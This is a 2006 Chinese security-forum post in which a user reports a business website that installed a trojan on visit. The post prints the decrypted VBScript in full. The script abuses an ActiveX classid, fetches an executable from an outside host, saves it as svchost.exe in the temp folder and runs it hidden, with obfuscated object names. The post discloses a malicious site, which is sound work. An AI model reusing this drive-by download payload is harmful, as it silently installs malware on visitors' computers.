|
 | 作者: SNNTSS [snntss]
 论坛用户 |
登录 |
| 一个商务网站, 打开自动安装DLL木马,原码加过密, 下面是我解密后的恶意代码段: <script language="VBScript"> on error resume next bi="object" aso="classid" shit="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" dl = "http://wmsjsf.com/admin.exe" Set df = document.createElement(bi) df.setAttribute aso, shit b4="Mi" b5="cr" b6="o" b7="soft" b8=".X" b9="M" b10="L" b11="H" b12="T" b13="T" b14="P" strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14 Set x = df.CreateObject(strb,"") a4="A" a5="d" a6="o" a7="d" a8="b" a9="." a10="S" a11="t" a12="r" a13="e" a14="a" a15="m" stra=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15 set S = df.createobject(stra,"") S.type = 1 c4="G" c5="E" c6="T" strc=c4&c5&c6 x.Open strc, dl, False x.Send cname1="svchost.exe" set F = df.createobject("Scripting.FileSystemObject","") set tmp = F.GetSpecialFolder(2) S.open cname1= F.BuildPath(tmp,cname1) S.write x.responseBody S.savetofile cname1,2 S.close set Q = df.createobject("Shell.Application","") Q.ShellExecute cname1,"","","open",0 </script> 我去http://www.miibeian.gov.cn举报了它, 如果这个站的人看到了这条信息,可联系我, 我要找你赔钱 ! 开了你的站, 让我损失了电脑里的重要数据 !! (老姜钓鱼,愿都上钩)  |
| 地主 发表时间: 06-08-15 00:36 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 今天又中了个恶站,我到MIIBEIAN举报了,看它能存活多久